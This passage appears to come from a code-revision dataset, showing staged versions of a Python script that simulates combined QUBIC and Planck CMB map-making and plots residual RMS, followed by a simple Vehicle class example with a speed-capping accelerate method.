all_solutions_fusion.append(solution_fusion)\n<mask token>\nfor i in xrange(len(nbptg)):\n figure(i)\n resid = all_solutions_fusion[i]['x'] - convolved_sky\n resid[~mask, :] = 0\n display(resid, 'Difference map', iplot=7, reso=reso, Trange=Trange)\n print(std(resid[mask, 0]), std(resid[mask, 1]), std(resid[mask, 2]))\n<mask token>\nclf()\nfor i in xrange(len(all_instruments)):\n resid = all_solutions_fusion[i]['x'] - convolved_sky\n idata = profile(all_coverages[i][mask] / np.max(all_coverages[i]), np.\n nan_to_num(resid[mask, 0]), nbins=nb, range=[0, 1], color=cols[i],\n plot=False)\n qdata = profile(all_coverages[i][mask] / np.max(all_coverages[i]), np.\n nan_to_num(resid[mask, 1]), nbins=nb, range=[0, 1], color=cols[i],\n plot=False)\n udata = profile(all_coverages[i][mask] / np.max(all_coverages[i]), np.\n nan_to_num(resid[mask, 2]), nbins=nb, range=[0, 1], color=cols[i],\n plot=False)\n subplot(3, 1, 1)\n yscale('log')\n xlabel('Normalized coverage')\n ylabel('I RMS residuals')\n ylim(0.1, 2)\n plot(idata[0], idata[3], color=cols[i], label=names[i], lw=2)\n if i == 0:\n plot(idata[0], idata[3] * sqrt(2), '--', color=cols[i], label=names\n [i] + ' x sqrt(2)', lw=2)\n legend(fontsize=fs, loc='upper right')\n subplot(3, 1, 2)\n yscale('log')\n xlabel('Normalized coverage')\n ylabel('Q RMS residuals')\n ylim(0.1, 2)\n plot(qdata[0], qdata[3], color=cols[i], label=names[i], lw=2)\n if i == 0:\n plot(qdata[0], qdata[3] * sqrt(2), '--', color=cols[i], label=names\n [i] + ' x sqrt(2)', lw=2)\n legend(fontsize=fs, loc='upper right')\n subplot(3, 1, 3)\n yscale('log')\n xlabel('Normalized coverage')\n ylabel('U RMS residuals')\n ylim(0.1, 2)\n plot(udata[0], udata[3], color=cols[i], label=names[i], lw=2)\n if i == 0:\n plot(udata[0], udata[3] * sqrt(2), '--', color=cols[i], label=names\n [i] + ' x sqrt(2)', lw=2)\n legend(fontsize=fs, loc='upper right')\n<mask token>\nclf()\nfor i in xrange(len(all_instruments)):\n resid = all_solutions_fusion[i]['x'] - convolved_sky\n 
idata = profile(all_coverages[i][mask] / np.max(all_coverages[i]), np.\n nan_to_num(resid[mask, 0]), nbins=nb, range=[0, 1], color=cols[i],\n plot=False)\n qdata = profile(all_coverages[i][mask] / np.max(all_coverages[i]), np.\n nan_to_num(resid[mask, 1]), nbins=nb, range=[0, 1], color=cols[i],\n plot=False)\n udata = profile(all_coverages[i][mask] / np.max(all_coverages[i]), np.\n nan_to_num(resid[mask, 2]), nbins=nb, range=[0, 1], color=cols[i],\n plot=False)\n if i == 0:\n theidata = idata\n theqdata = qdata\n theudata = udata\n subplot(3, 1, 1)\n xlabel('Normalized coverage')\n ylabel('I RMS residuals ratio \\n w.r.t. Full Instrument')\n ylim(0.0, 3)\n plot(linspace(0, 1, 10), np.zeros(10) + sqrt(2), 'k--')\n plot(idata[0], idata[3] / theidata[3], color=cols[i], label=names[i], lw=2)\n legend(fontsize=fs, loc='upper right')\n subplot(3, 1, 2)\n xlabel('Normalized coverage')\n ylabel('Q RMS residuals ratio \\n w.r.t. Full Instrument')\n ylim(0.0, 3)\n plot(qdata[0], qdata[3] / theqdata[3], color=cols[i], label=names[i], lw=2)\n plot(linspace(0, 1, 10), np.zeros(10) + sqrt(2), 'k--')\n legend(fontsize=fs, loc='upper right')\n subplot(3, 1, 3)\n xlabel('Normalized coverage')\n ylabel('U RMS residuals ratio \\n w.r.t. Full Instrument')\n ylim(0.0, 3)\n plot(udata[0], udata[3] / theudata[3], color=cols[i], label=names[i], lw=2)\n plot(linspace(0, 1, 10), np.zeros(10) + sqrt(2), 'k--')\n legend(fontsize=fs, loc='upper right')\n",
"step-3": "<mask token>\n\n\ndef statstr(vec):\n m = np.mean(vec)\n s = np.std(vec)\n return '{0:.4f} +/- {1:.4f}'.format(m, s)\n\n\ndef plotinst(inst, shift=0.12):\n for xyc, quad in zip(inst.detector.center, inst.detector.quadrant):\n if quad < 4:\n plot(xyc[0], xyc[1], 'ro')\n else:\n plot(xyc[0] + shift, xyc[1], 'bo')\n xlim(-0.06, 0.18)\n\n\ndef display(input, msg, iplot=1, reso=5, Trange=[100, 5, 5]):\n out = []\n for i, (kind, lim) in enumerate(zip('IQU', Trange)):\n map = input[..., i]\n out += [hp.gnomview(map, rot=center, reso=reso, xsize=800, min=-lim,\n max=lim, title=msg + ' ' + kind, sub=(3, 3, iplot + i),\n return_projected_map=True)]\n return out\n\n\ndef profile(x, y, range=None, nbins=10, fmt=None, plot=True, dispersion=\n True, color=None):\n if range == None:\n mini = np.min(x)\n maxi = np.max(x)\n else:\n mini = range[0]\n maxi = range[1]\n dx = (maxi - mini) / nbins\n xmin = np.linspace(mini, maxi - dx, nbins)\n xmax = xmin + dx\n xc = xmin + dx / 2\n yval = np.zeros(nbins)\n dy = np.zeros(nbins)\n dx = np.zeros(nbins) + dx / 2\n for i in np.arange(nbins):\n ok = (x > xmin[i]) & (x < xmax[i])\n yval[i] = np.mean(y[ok])\n if dispersion:\n fact = 1\n else:\n fact = np.sqrt(len(y[ok]))\n dy[i] = np.std(y[ok]) / fact\n if plot:\n errorbar(xc, yval, xerr=dx, yerr=dy, fmt=fmt, color=color)\n return xc, yval, dx, dy\n\n\nnside = 256\nracenter = 0.0\ndeccenter = -57.0\ncenter = equ2gal(racenter, deccenter)\nsky = read_map(PATH + 'syn256_pol.fits')\nsampling = create_random_pointings([racenter, deccenter], 1000, 10)\nall_solutions_fusion = []\nall_coverages = []\nnbptg = np.linspace(1000, 5000, 5)\ncorrect_time = 365 * 86400.0 / (nbptg / 1000)\ndetector_nep = 4.7e-17 / np.sqrt(correct_time / len(sampling) * sampling.period\n )\nfor i in xrange(len(all_instruments)):\n acq_qubic = QubicAcquisition(150, sampling, nside=nside, detector_nep=\n detector_nep[i])\n all_coverages.append(acq_qubic.get_coverage())\n convolved_sky = 
acq_qubic.instrument.get_convolution_peak_operator()(sky)\n acq_planck = PlanckAcquisition(150, acq_qubic.scene, true_sky=convolved_sky\n )\n acq_fusion = QubicPlanckAcquisition(acq_qubic, acq_planck)\n H = acq_fusion.get_operator()\n invntt = acq_fusion.get_invntt_operator()\n obs = acq_fusion.get_observation()\n A = H.T * invntt * H\n b = H.T * invntt * obs\n solution_fusion = pcg(A, b, disp=True)\n all_solutions_fusion.append(solution_fusion)\nmask = all_coverages[0] > np.max(all_coverages[0] / 10)\nreso = 3\nTrange = [10, 10, 10]\nfor i in xrange(len(nbptg)):\n figure(i)\n resid = all_solutions_fusion[i]['x'] - convolved_sky\n resid[~mask, :] = 0\n display(resid, 'Difference map', iplot=7, reso=reso, Trange=Trange)\n print(std(resid[mask, 0]), std(resid[mask, 1]), std(resid[mask, 2]))\ncols = ['black', 'red', 'blue', 'green', 'orange']\naa = 0.2\nrng = [-2, 4]\nfs = 8\nnb = 20\nclf()\nfor i in xrange(len(all_instruments)):\n resid = all_solutions_fusion[i]['x'] - convolved_sky\n idata = profile(all_coverages[i][mask] / np.max(all_coverages[i]), np.\n nan_to_num(resid[mask, 0]), nbins=nb, range=[0, 1], color=cols[i],\n plot=False)\n qdata = profile(all_coverages[i][mask] / np.max(all_coverages[i]), np.\n nan_to_num(resid[mask, 1]), nbins=nb, range=[0, 1], color=cols[i],\n plot=False)\n udata = profile(all_coverages[i][mask] / np.max(all_coverages[i]), np.\n nan_to_num(resid[mask, 2]), nbins=nb, range=[0, 1], color=cols[i],\n plot=False)\n subplot(3, 1, 1)\n yscale('log')\n xlabel('Normalized coverage')\n ylabel('I RMS residuals')\n ylim(0.1, 2)\n plot(idata[0], idata[3], color=cols[i], label=names[i], lw=2)\n if i == 0:\n plot(idata[0], idata[3] * sqrt(2), '--', color=cols[i], label=names\n [i] + ' x sqrt(2)', lw=2)\n legend(fontsize=fs, loc='upper right')\n subplot(3, 1, 2)\n yscale('log')\n xlabel('Normalized coverage')\n ylabel('Q RMS residuals')\n ylim(0.1, 2)\n plot(qdata[0], qdata[3], color=cols[i], label=names[i], lw=2)\n if i == 0:\n plot(qdata[0], 
qdata[3] * sqrt(2), '--', color=cols[i], label=names\n [i] + ' x sqrt(2)', lw=2)\n legend(fontsize=fs, loc='upper right')\n subplot(3, 1, 3)\n yscale('log')\n xlabel('Normalized coverage')\n ylabel('U RMS residuals')\n ylim(0.1, 2)\n plot(udata[0], udata[3], color=cols[i], label=names[i], lw=2)\n if i == 0:\n plot(udata[0], udata[3] * sqrt(2), '--', color=cols[i], label=names\n [i] + ' x sqrt(2)', lw=2)\n legend(fontsize=fs, loc='upper right')\ncols = ['black', 'red', 'blue', 'green', 'orange']\naa = 0.2\nrng = [-2, 4]\nfs = 8\nnb = 20\nclf()\nfor i in xrange(len(all_instruments)):\n resid = all_solutions_fusion[i]['x'] - convolved_sky\n idata = profile(all_coverages[i][mask] / np.max(all_coverages[i]), np.\n nan_to_num(resid[mask, 0]), nbins=nb, range=[0, 1], color=cols[i],\n plot=False)\n qdata = profile(all_coverages[i][mask] / np.max(all_coverages[i]), np.\n nan_to_num(resid[mask, 1]), nbins=nb, range=[0, 1], color=cols[i],\n plot=False)\n udata = profile(all_coverages[i][mask] / np.max(all_coverages[i]), np.\n nan_to_num(resid[mask, 2]), nbins=nb, range=[0, 1], color=cols[i],\n plot=False)\n if i == 0:\n theidata = idata\n theqdata = qdata\n theudata = udata\n subplot(3, 1, 1)\n xlabel('Normalized coverage')\n ylabel('I RMS residuals ratio \\n w.r.t. Full Instrument')\n ylim(0.0, 3)\n plot(linspace(0, 1, 10), np.zeros(10) + sqrt(2), 'k--')\n plot(idata[0], idata[3] / theidata[3], color=cols[i], label=names[i], lw=2)\n legend(fontsize=fs, loc='upper right')\n subplot(3, 1, 2)\n xlabel('Normalized coverage')\n ylabel('Q RMS residuals ratio \\n w.r.t. Full Instrument')\n ylim(0.0, 3)\n plot(qdata[0], qdata[3] / theqdata[3], color=cols[i], label=names[i], lw=2)\n plot(linspace(0, 1, 10), np.zeros(10) + sqrt(2), 'k--')\n legend(fontsize=fs, loc='upper right')\n subplot(3, 1, 3)\n xlabel('Normalized coverage')\n ylabel('U RMS residuals ratio \\n w.r.t. 
Full Instrument')\n ylim(0.0, 3)\n plot(udata[0], udata[3] / theudata[3], color=cols[i], label=names[i], lw=2)\n plot(linspace(0, 1, 10), np.zeros(10) + sqrt(2), 'k--')\n legend(fontsize=fs, loc='upper right')\n",
"step-4": "from __future__ import division\nfrom pyoperators import pcg\nfrom pysimulators import profile\nfrom qubic import create_random_pointings, equ2gal, QubicAcquisition, PlanckAcquisition, QubicPlanckAcquisition, QubicInstrument\nfrom qubic.data import PATH\nfrom qubic.io import read_map\nimport healpy as hp\nimport matplotlib.pyplot as mp\nimport numpy as np\n\n\ndef statstr(vec):\n m = np.mean(vec)\n s = np.std(vec)\n return '{0:.4f} +/- {1:.4f}'.format(m, s)\n\n\ndef plotinst(inst, shift=0.12):\n for xyc, quad in zip(inst.detector.center, inst.detector.quadrant):\n if quad < 4:\n plot(xyc[0], xyc[1], 'ro')\n else:\n plot(xyc[0] + shift, xyc[1], 'bo')\n xlim(-0.06, 0.18)\n\n\ndef display(input, msg, iplot=1, reso=5, Trange=[100, 5, 5]):\n out = []\n for i, (kind, lim) in enumerate(zip('IQU', Trange)):\n map = input[..., i]\n out += [hp.gnomview(map, rot=center, reso=reso, xsize=800, min=-lim,\n max=lim, title=msg + ' ' + kind, sub=(3, 3, iplot + i),\n return_projected_map=True)]\n return out\n\n\ndef profile(x, y, range=None, nbins=10, fmt=None, plot=True, dispersion=\n True, color=None):\n if range == None:\n mini = np.min(x)\n maxi = np.max(x)\n else:\n mini = range[0]\n maxi = range[1]\n dx = (maxi - mini) / nbins\n xmin = np.linspace(mini, maxi - dx, nbins)\n xmax = xmin + dx\n xc = xmin + dx / 2\n yval = np.zeros(nbins)\n dy = np.zeros(nbins)\n dx = np.zeros(nbins) + dx / 2\n for i in np.arange(nbins):\n ok = (x > xmin[i]) & (x < xmax[i])\n yval[i] = np.mean(y[ok])\n if dispersion:\n fact = 1\n else:\n fact = np.sqrt(len(y[ok]))\n dy[i] = np.std(y[ok]) / fact\n if plot:\n errorbar(xc, yval, xerr=dx, yerr=dy, fmt=fmt, color=color)\n return xc, yval, dx, dy\n\n\nnside = 256\nracenter = 0.0\ndeccenter = -57.0\ncenter = equ2gal(racenter, deccenter)\nsky = read_map(PATH + 'syn256_pol.fits')\nsampling = create_random_pointings([racenter, deccenter], 1000, 10)\nall_solutions_fusion = []\nall_coverages = []\nnbptg = np.linspace(1000, 5000, 5)\ncorrect_time = 
365 * 86400.0 / (nbptg / 1000)\ndetector_nep = 4.7e-17 / np.sqrt(correct_time / len(sampling) * sampling.period\n )\nfor i in xrange(len(all_instruments)):\n acq_qubic = QubicAcquisition(150, sampling, nside=nside, detector_nep=\n detector_nep[i])\n all_coverages.append(acq_qubic.get_coverage())\n convolved_sky = acq_qubic.instrument.get_convolution_peak_operator()(sky)\n acq_planck = PlanckAcquisition(150, acq_qubic.scene, true_sky=convolved_sky\n )\n acq_fusion = QubicPlanckAcquisition(acq_qubic, acq_planck)\n H = acq_fusion.get_operator()\n invntt = acq_fusion.get_invntt_operator()\n obs = acq_fusion.get_observation()\n A = H.T * invntt * H\n b = H.T * invntt * obs\n solution_fusion = pcg(A, b, disp=True)\n all_solutions_fusion.append(solution_fusion)\nmask = all_coverages[0] > np.max(all_coverages[0] / 10)\nreso = 3\nTrange = [10, 10, 10]\nfor i in xrange(len(nbptg)):\n figure(i)\n resid = all_solutions_fusion[i]['x'] - convolved_sky\n resid[~mask, :] = 0\n display(resid, 'Difference map', iplot=7, reso=reso, Trange=Trange)\n print(std(resid[mask, 0]), std(resid[mask, 1]), std(resid[mask, 2]))\ncols = ['black', 'red', 'blue', 'green', 'orange']\naa = 0.2\nrng = [-2, 4]\nfs = 8\nnb = 20\nclf()\nfor i in xrange(len(all_instruments)):\n resid = all_solutions_fusion[i]['x'] - convolved_sky\n idata = profile(all_coverages[i][mask] / np.max(all_coverages[i]), np.\n nan_to_num(resid[mask, 0]), nbins=nb, range=[0, 1], color=cols[i],\n plot=False)\n qdata = profile(all_coverages[i][mask] / np.max(all_coverages[i]), np.\n nan_to_num(resid[mask, 1]), nbins=nb, range=[0, 1], color=cols[i],\n plot=False)\n udata = profile(all_coverages[i][mask] / np.max(all_coverages[i]), np.\n nan_to_num(resid[mask, 2]), nbins=nb, range=[0, 1], color=cols[i],\n plot=False)\n subplot(3, 1, 1)\n yscale('log')\n xlabel('Normalized coverage')\n ylabel('I RMS residuals')\n ylim(0.1, 2)\n plot(idata[0], idata[3], color=cols[i], label=names[i], lw=2)\n if i == 0:\n plot(idata[0], idata[3] * 
sqrt(2), '--', color=cols[i], label=names\n [i] + ' x sqrt(2)', lw=2)\n legend(fontsize=fs, loc='upper right')\n subplot(3, 1, 2)\n yscale('log')\n xlabel('Normalized coverage')\n ylabel('Q RMS residuals')\n ylim(0.1, 2)\n plot(qdata[0], qdata[3], color=cols[i], label=names[i], lw=2)\n if i == 0:\n plot(qdata[0], qdata[3] * sqrt(2), '--', color=cols[i], label=names\n [i] + ' x sqrt(2)', lw=2)\n legend(fontsize=fs, loc='upper right')\n subplot(3, 1, 3)\n yscale('log')\n xlabel('Normalized coverage')\n ylabel('U RMS residuals')\n ylim(0.1, 2)\n plot(udata[0], udata[3], color=cols[i], label=names[i], lw=2)\n if i == 0:\n plot(udata[0], udata[3] * sqrt(2), '--', color=cols[i], label=names\n [i] + ' x sqrt(2)', lw=2)\n legend(fontsize=fs, loc='upper right')\ncols = ['black', 'red', 'blue', 'green', 'orange']\naa = 0.2\nrng = [-2, 4]\nfs = 8\nnb = 20\nclf()\nfor i in xrange(len(all_instruments)):\n resid = all_solutions_fusion[i]['x'] - convolved_sky\n idata = profile(all_coverages[i][mask] / np.max(all_coverages[i]), np.\n nan_to_num(resid[mask, 0]), nbins=nb, range=[0, 1], color=cols[i],\n plot=False)\n qdata = profile(all_coverages[i][mask] / np.max(all_coverages[i]), np.\n nan_to_num(resid[mask, 1]), nbins=nb, range=[0, 1], color=cols[i],\n plot=False)\n udata = profile(all_coverages[i][mask] / np.max(all_coverages[i]), np.\n nan_to_num(resid[mask, 2]), nbins=nb, range=[0, 1], color=cols[i],\n plot=False)\n if i == 0:\n theidata = idata\n theqdata = qdata\n theudata = udata\n subplot(3, 1, 1)\n xlabel('Normalized coverage')\n ylabel('I RMS residuals ratio \\n w.r.t. Full Instrument')\n ylim(0.0, 3)\n plot(linspace(0, 1, 10), np.zeros(10) + sqrt(2), 'k--')\n plot(idata[0], idata[3] / theidata[3], color=cols[i], label=names[i], lw=2)\n legend(fontsize=fs, loc='upper right')\n subplot(3, 1, 2)\n xlabel('Normalized coverage')\n ylabel('Q RMS residuals ratio \\n w.r.t. 
Full Instrument')\n ylim(0.0, 3)\n plot(qdata[0], qdata[3] / theqdata[3], color=cols[i], label=names[i], lw=2)\n plot(linspace(0, 1, 10), np.zeros(10) + sqrt(2), 'k--')\n legend(fontsize=fs, loc='upper right')\n subplot(3, 1, 3)\n xlabel('Normalized coverage')\n ylabel('U RMS residuals ratio \\n w.r.t. Full Instrument')\n ylim(0.0, 3)\n plot(udata[0], udata[3] / theudata[3], color=cols[i], label=names[i], lw=2)\n plot(linspace(0, 1, 10), np.zeros(10) + sqrt(2), 'k--')\n legend(fontsize=fs, loc='upper right')\n",
"step-5": "from __future__ import division\nfrom pyoperators import pcg\nfrom pysimulators import profile\nfrom qubic import (\n create_random_pointings, equ2gal, QubicAcquisition, PlanckAcquisition,\n QubicPlanckAcquisition, QubicInstrument)\nfrom qubic.data import PATH\nfrom qubic.io import read_map\nimport healpy as hp\nimport matplotlib.pyplot as mp\nimport numpy as np\n\n\n\ndef statstr(vec):\n m=np.mean(vec)\n s=np.std(vec)\n return '{0:.4f} +/- {1:.4f}'.format(m,s)\n\ndef plotinst(inst,shift=0.12):\n for xyc, quad in zip(inst.detector.center, inst.detector.quadrant): \n if quad < 4:\n plot(xyc[0],xyc[1],'ro')\n else:\n plot(xyc[0]+shift,xyc[1],'bo')\n xlim(-0.06, 0.18)\n\n\ndef display(input, msg, iplot=1, reso=5, Trange=[100, 5, 5]):\n out = []\n for i, (kind, lim) in enumerate(zip('IQU', Trange)):\n map = input[..., i]\n out += [hp.gnomview(map, rot=center, reso=reso, xsize=800, min=-lim,\n max=lim, title=msg + ' ' + kind,\n sub=(3, 3, iplot + i), return_projected_map=True)]\n return out\n\n\ndef profile(x,y,range=None,nbins=10,fmt=None,plot=True, dispersion=True, color=None):\n if range == None:\n mini = np.min(x)\n maxi = np.max(x)\n else:\n mini = range[0]\n maxi = range[1]\n dx = (maxi - mini) / nbins\n xmin = np.linspace(mini,maxi-dx,nbins)\n xmax = xmin + dx\n xc = xmin + dx / 2\n yval = np.zeros(nbins)\n dy = np.zeros(nbins)\n dx = np.zeros(nbins) + dx / 2\n for i in np.arange(nbins):\n ok = (x > xmin[i]) & (x < xmax[i])\n yval[i] = np.mean(y[ok])\n if dispersion: \n fact = 1\n else:\n fact = np.sqrt(len(y[ok]))\n dy[i] = np.std(y[ok])/fact\n if plot: errorbar(xc, yval, xerr=dx, yerr=dy, fmt=fmt, color=color)\n return xc, yval, dx, dy\n\n\nnside = 256\nracenter = 0.0 # deg\ndeccenter = -57.0 # deg\ncenter = equ2gal(racenter, deccenter)\n\nsky = read_map(PATH + 'syn256_pol.fits')\nsampling = create_random_pointings([racenter, deccenter], 1000, 10)\n\n\nall_solutions_fusion = []\nall_coverages = []\n\nnbptg = np.linspace(1000,5000,5)\ncorrect_time = 
365*86400./(nbptg/1000)\ndetector_nep = 4.7e-17/np.sqrt(correct_time / len(sampling)*sampling.period)\n\nfor i in xrange(len(all_instruments)):\n\tacq_qubic = QubicAcquisition(150, sampling, nside=nside,\n detector_nep=detector_nep[i])\n\tall_coverages.append(acq_qubic.get_coverage())\n\tconvolved_sky = acq_qubic.instrument.get_convolution_peak_operator()(sky)\n\tacq_planck = PlanckAcquisition(150, acq_qubic.scene, true_sky=convolved_sky)\n\tacq_fusion = QubicPlanckAcquisition(acq_qubic, acq_planck)\n\n\tH = acq_fusion.get_operator()\n\tinvntt = acq_fusion.get_invntt_operator()\n\tobs = acq_fusion.get_observation()\n\n\tA = H.T * invntt * H\n\tb = H.T * invntt * obs\n\n\tsolution_fusion = pcg(A, b, disp=True)\n\tall_solutions_fusion.append(solution_fusion)\n\n\n\n\n\nmask = all_coverages[0] > np.max(all_coverages[0]/10)\n\nreso=3\nTrange=[10, 10, 10]\nfor i in xrange(len(nbptg)):\n\tfigure(i)\n\tresid = all_solutions_fusion[i]['x'] - convolved_sky\n\tresid[~mask,:] = 0\n\tdisplay(resid, 'Difference map', iplot=7, reso=reso, Trange=Trange)\n\tprint(std(resid[mask,0]), std(resid[mask,1]), std(resid[mask,2]))\n\t#savefig(names[i]+'.png')\n\n\ncols=['black', 'red','blue','green', 'orange']\naa=0.2\nrng = [-2,4]\nfs=8\nnb=20\nclf()\nfor i in xrange(len(all_instruments)):\n\tresid = all_solutions_fusion[i]['x'] - convolved_sky\n\tidata = profile(all_coverages[i][mask]/np.max(all_coverages[i]), np.nan_to_num(resid[mask,0]), nbins=nb, range=[0,1],color=cols[i], plot=False)\n\tqdata = profile(all_coverages[i][mask]/np.max(all_coverages[i]), np.nan_to_num(resid[mask,1]), nbins=nb, range=[0,1],color=cols[i], plot=False)\n\tudata = profile(all_coverages[i][mask]/np.max(all_coverages[i]), np.nan_to_num(resid[mask,2]), nbins=nb, range=[0,1],color=cols[i], plot=False)\n\n\tsubplot(3,1,1)\n\tyscale('log')\n\txlabel('Normalized coverage')\n\tylabel('I RMS residuals')\n\tylim(0.1,2)\n\tplot(idata[0], idata[3], color=cols[i], label=names[i], lw=2)\n\tif i==0: plot(idata[0], 
idata[3]*sqrt(2), '--', color=cols[i], label=names[i]+' x sqrt(2)', lw=2)\n\tlegend(fontsize=fs, loc='upper right')\n\n\tsubplot(3,1,2)\n\tyscale('log')\n\txlabel('Normalized coverage')\n\tylabel('Q RMS residuals')\n\tylim(0.1,2)\n\tplot(qdata[0], qdata[3], color=cols[i], label=names[i], lw=2)\n\tif i==0: plot(qdata[0], qdata[3]*sqrt(2), '--', color=cols[i], label=names[i]+' x sqrt(2)', lw=2)\n\tlegend(fontsize=fs, loc='upper right')\n\n\tsubplot(3,1,3)\n\tyscale('log')\n\txlabel('Normalized coverage')\n\tylabel('U RMS residuals')\n\tylim(0.1,2)\n\tplot(udata[0], udata[3], color=cols[i], label=names[i], lw=2)\n\tif i==0: plot(udata[0], udata[3]*sqrt(2), '--', color=cols[i], label=names[i]+' x sqrt(2)', lw=2)\n\tlegend(fontsize=fs, loc='upper right')\n\n#savefig('rms.png')\n\n\n\n\ncols=['black', 'red','blue','green', 'orange']\naa=0.2\nrng = [-2,4]\nfs=8\nnb=20\nclf()\nfor i in xrange(len(all_instruments)):\n\tresid = all_solutions_fusion[i]['x'] - convolved_sky\n\tidata = profile(all_coverages[i][mask]/np.max(all_coverages[i]), np.nan_to_num(resid[mask,0]), nbins=nb, range=[0,1],color=cols[i], plot=False)\n\tqdata = profile(all_coverages[i][mask]/np.max(all_coverages[i]), np.nan_to_num(resid[mask,1]), nbins=nb, range=[0,1],color=cols[i], plot=False)\n\tudata = profile(all_coverages[i][mask]/np.max(all_coverages[i]), np.nan_to_num(resid[mask,2]), nbins=nb, range=[0,1],color=cols[i], plot=False)\n\tif i == 0 :\n\t\ttheidata = idata\n\t\ttheqdata = qdata\n\t\ttheudata = udata\n\n\tsubplot(3,1,1)\n\txlabel('Normalized coverage')\n\tylabel('I RMS residuals ratio \\n w.r.t. Full Instrument')\n\tylim(0.,3)\n\tplot(linspace(0,1,10),np.zeros(10)+sqrt(2), 'k--')\n\tplot(idata[0], idata[3]/theidata[3], color=cols[i], label=names[i], lw=2)\n\tlegend(fontsize=fs, loc='upper right')\n\n\tsubplot(3,1,2)\n\txlabel('Normalized coverage')\n\tylabel('Q RMS residuals ratio \\n w.r.t. 
Full Instrument')\n\tylim(0.,3)\n\tplot(qdata[0], qdata[3]/theqdata[3], color=cols[i], label=names[i], lw=2)\n\tplot(linspace(0,1,10),np.zeros(10)+sqrt(2), 'k--')\n\tlegend(fontsize=fs, loc='upper right')\n\n\tsubplot(3,1,3)\n\txlabel('Normalized coverage')\n\tylabel('U RMS residuals ratio \\n w.r.t. Full Instrument')\n\tylim(0.,3)\n\tplot(udata[0], udata[3]/theudata[3], color=cols[i], label=names[i], lw=2)\n\tplot(linspace(0,1,10),np.zeros(10)+sqrt(2), 'k--')\n\tlegend(fontsize=fs, loc='upper right')\n\n#savefig('rms_ratio.png')\n\n\n\n",
"step-ids": [
4,
5,
6,
7,
8
]
}
|
[
4,
5,
6,
7,
8
] |
# class Mob:
# def __init__(self, name, health=10):
# self.name = name
# self.health = health
# def get_hit(self, power):
# self.health -= power
# print(
# f"I, {self.name} was hit for {power} points. {self.health} pts remaining")
# hero = Mob("Sir Barks-alot", 30)
# hero.get_hit(6)
class Vehicle:
    """A simple kinematic vehicle that accelerates up to a fixed top speed.

    State advances in discrete ticks: ``accelerate()`` raises the speed by
    one acceleration step (clamped at ``top_speed``) and ``move()`` advances
    the position by the current speed.
    """

    def __init__(self, category, top_speed, acceleration, position=0, speed=0, wheels=4):
        # category:     display name used in move() output, e.g. "Ducati"
        # top_speed:    hard upper bound on speed
        # acceleration: speed gained per accelerate() call
        # position:     starting position (default 0)
        # speed:        starting speed (default 0)
        # wheels:       wheel count; stored but unused by the methods here
        self.category = category
        self.speed = speed
        self.top_speed = top_speed
        self.position = position
        self.acceleration = acceleration
        self.wheels = wheels

    def move(self):
        """Advance position by the current speed and report the new position."""
        self.position += self.speed
        print(f"{self.category} is moving. New position is {self.position}")

    def accelerate(self):
        """Increase speed by one acceleration step, clamped at top_speed."""
        # min() replaces the original if/else, whose two branches duplicated
        # the print; the printed value is unchanged in every case.
        self.speed = min(self.speed + self.acceleration, self.top_speed)
        print(self.speed)
# Simulate 21 ticks of a Ducati accelerating from rest toward its
# top speed of 12, advancing by one acceleration step (3) per tick.
motorcycle = Vehicle("Ducati", 12, 3)
i = 0
while True:
    motorcycle.accelerate()
    motorcycle.move()
    i += 1
    if i > 20:
        break
# motorcycle.accelerate()
# motorcycle.move()
# motorcycle.accelerate()
# motorcycle.move()
# motorcycle.accelerate()
# motorcycle.move()
# motorcycle.accelerate()
# motorcycle.move()
|
normal
|
{
"blob_id": "b1573f80395d31017ceacbb998e421daf20ab75f",
"index": 6961,
"step-1": "class Vehicle:\n\n def __init__(self, category, top_speed, acceleration, position=0, speed\n =0, wheels=4):\n self.category = category\n self.speed = speed\n self.top_speed = top_speed\n self.position = position\n self.acceleration = acceleration\n self.wheels = wheels\n <mask token>\n\n def accelerate(self):\n potential = self.speed + self.acceleration\n if self.top_speed >= potential:\n self.speed += self.acceleration\n print(self.speed)\n else:\n self.speed = self.top_speed\n print(self.speed)\n\n\n<mask token>\n",
"step-2": "class Vehicle:\n\n def __init__(self, category, top_speed, acceleration, position=0, speed\n =0, wheels=4):\n self.category = category\n self.speed = speed\n self.top_speed = top_speed\n self.position = position\n self.acceleration = acceleration\n self.wheels = wheels\n\n def move(self):\n self.position += self.speed\n print(f'{self.category} is moving. New position is {self.position}')\n\n def accelerate(self):\n potential = self.speed + self.acceleration\n if self.top_speed >= potential:\n self.speed += self.acceleration\n print(self.speed)\n else:\n self.speed = self.top_speed\n print(self.speed)\n\n\n<mask token>\n",
"step-3": "class Vehicle:\n\n def __init__(self, category, top_speed, acceleration, position=0, speed\n =0, wheels=4):\n self.category = category\n self.speed = speed\n self.top_speed = top_speed\n self.position = position\n self.acceleration = acceleration\n self.wheels = wheels\n\n def move(self):\n self.position += self.speed\n print(f'{self.category} is moving. New position is {self.position}')\n\n def accelerate(self):\n potential = self.speed + self.acceleration\n if self.top_speed >= potential:\n self.speed += self.acceleration\n print(self.speed)\n else:\n self.speed = self.top_speed\n print(self.speed)\n\n\n<mask token>\nwhile i <= 20:\n motorcycle.accelerate()\n motorcycle.move()\n i += 1\n",
"step-4": "class Vehicle:\n\n def __init__(self, category, top_speed, acceleration, position=0, speed\n =0, wheels=4):\n self.category = category\n self.speed = speed\n self.top_speed = top_speed\n self.position = position\n self.acceleration = acceleration\n self.wheels = wheels\n\n def move(self):\n self.position += self.speed\n print(f'{self.category} is moving. New position is {self.position}')\n\n def accelerate(self):\n potential = self.speed + self.acceleration\n if self.top_speed >= potential:\n self.speed += self.acceleration\n print(self.speed)\n else:\n self.speed = self.top_speed\n print(self.speed)\n\n\ni = 0\nmotorcycle = Vehicle('Ducati', 12, 3)\nwhile i <= 20:\n motorcycle.accelerate()\n motorcycle.move()\n i += 1\n",
"step-5": "# class Mob:\n# def __init__(self, name, health=10):\n# self.name = name\n# self.health = health\n\n# def get_hit(self, power):\n# self.health -= power\n# print(\n# f\"I, {self.name} was hit for {power} points. {self.health} pts remaining\")\n\n\n# hero = Mob(\"Sir Barks-alot\", 30)\n# hero.get_hit(6)\n\n\nclass Vehicle:\n def __init__(self, category, top_speed, acceleration, position=0, speed=0, wheels=4):\n self.category = category\n self.speed = speed\n self.top_speed = top_speed\n self.position = position\n self.acceleration = acceleration\n self.wheels = wheels\n\n def move(self):\n self.position += self.speed\n # print(f\"{self.speed}\")\n print(f\"{self.category} is moving. New position is {self.position}\")\n\n def accelerate(self):\n potential = self.speed + self.acceleration\n if self.top_speed >= potential:\n self.speed += self.acceleration\n print(self.speed)\n else:\n self.speed = self.top_speed\n print(self.speed)\n\n\ni = 0\nmotorcycle = 